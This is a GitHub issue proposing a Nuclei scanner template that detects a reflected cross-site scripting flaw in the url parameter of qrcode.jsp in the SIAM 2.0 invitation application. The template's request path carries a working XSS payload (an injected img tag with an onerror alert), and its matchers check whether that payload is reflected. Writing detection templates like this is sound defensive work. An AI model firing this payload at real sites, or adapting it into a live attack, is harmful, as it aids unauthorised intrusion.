### ISSUE TITLE
SIAM 2.0 Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by 3th1cyuk1** [projectdiscovery/nuclei-templates#11772]
### Is there an existing template for this?

- [x] I have searched the existing templates.

### Nuclei Template

```yaml
id: siam-xss

info:
  name: SIAM 2.0 Reflected Cross-Site Scripting
  author: 3th1c_yuk1
  severity: medium
  description: |
    A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the SIAM Invitation application. The url parameter of the qrcode.jsp page does not properly >
  reference: |
    - https://vuldb.com/?submit.496171

http:
  - method: GET
    path:
      - "{{BaseURL}}/siam-convite/qrcode.jsp?url=1%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - "text/html"
```

### Relevant dumped responses

```shell

```
